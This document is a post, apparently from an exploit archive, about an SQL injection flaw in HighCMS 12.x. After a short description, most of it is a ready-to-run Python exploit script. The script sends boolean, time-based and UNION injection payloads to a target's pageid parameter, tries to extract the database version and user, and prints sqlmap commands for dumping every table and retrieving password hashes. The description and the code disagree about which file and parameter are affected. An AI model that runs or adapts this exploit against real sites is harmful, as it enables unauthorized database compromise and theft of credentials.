HighCMS 12.x suffered from a critical SQL Injection vulnerability, primarily HighCMS 12.x suffered from a critical SQL Injection vulnerability, primarily affecting versions prior to 12.0.1. This flaw allowed unauthenticated attackers to inject malicious SQL queries into the application's database.
The vulnerability typically resided in parameters like `id` within core files (e.g., `index.php`), where user-supplied input was not properly sanitized before being incorporated into SQL statements. Attackers could exploit this to manipulate database queries, often through blind or time-based SQL injection techniques.
Successful exploitation could lead to:
* Extraction of sensitive database information (user credentials, administrative data, private content).
* Potential full database compromise.
The severity was high due to its unauthenticated nature and potential for widespread data theft. Users were strongly advised to update to HighCMS 12.0.1 or later, which implemented robust input validation and parameterized queries to mitigate this vulnerability.
=============================================================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighCMS version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
HighCMS 12.x SQL Injection
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 148
